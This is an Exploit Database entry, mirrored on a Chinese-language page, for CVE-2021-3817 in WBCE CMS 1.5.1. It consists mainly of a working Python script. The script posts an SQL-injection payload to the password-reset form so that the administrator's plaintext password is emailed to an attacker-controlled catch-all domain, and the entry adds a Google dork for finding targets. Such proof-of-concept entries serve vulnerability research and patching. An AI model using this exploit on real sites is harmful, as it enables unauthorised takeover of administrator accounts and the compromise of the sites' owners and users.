WBCE CMS 1.5.1 – Admin Password Reset

• Exploit Database
• 15 阅读

• 作者： citril
  日期： 2021-12-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50609/

• # Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
  # Google Dork: intext: "Way Better Content Editing"
  # Date: 20/12/2021
  # Exploit Author: citril or https://github.com/maxway2021
  # Vendor Homepage: https://wbce.org/
  # Software Link: https://wbce.org/de/downloads/
  # Version: <= 1.5.1
  # Tested on: Linux
  # CVE : CVE-2021-3817
  # Github repo: https://github.com/WBCE/WBCE_CMS
  # Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75
  
  import requests
  
  _url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
  _domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature
  
  headers = {
  'User-Agent': 'Mozilla/5.0',
  'Accept':
  'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
  'Accept-Language': 'en-US,en;q=0.5',
  'Content-Type': 'application/x-www-form-urlencoded',
  'Connection': 'close'
  }
  
  _p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"
  
  r = requests.post(url = _url, headers = headers, data = _p)
  if r.status_code == 200:
  print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')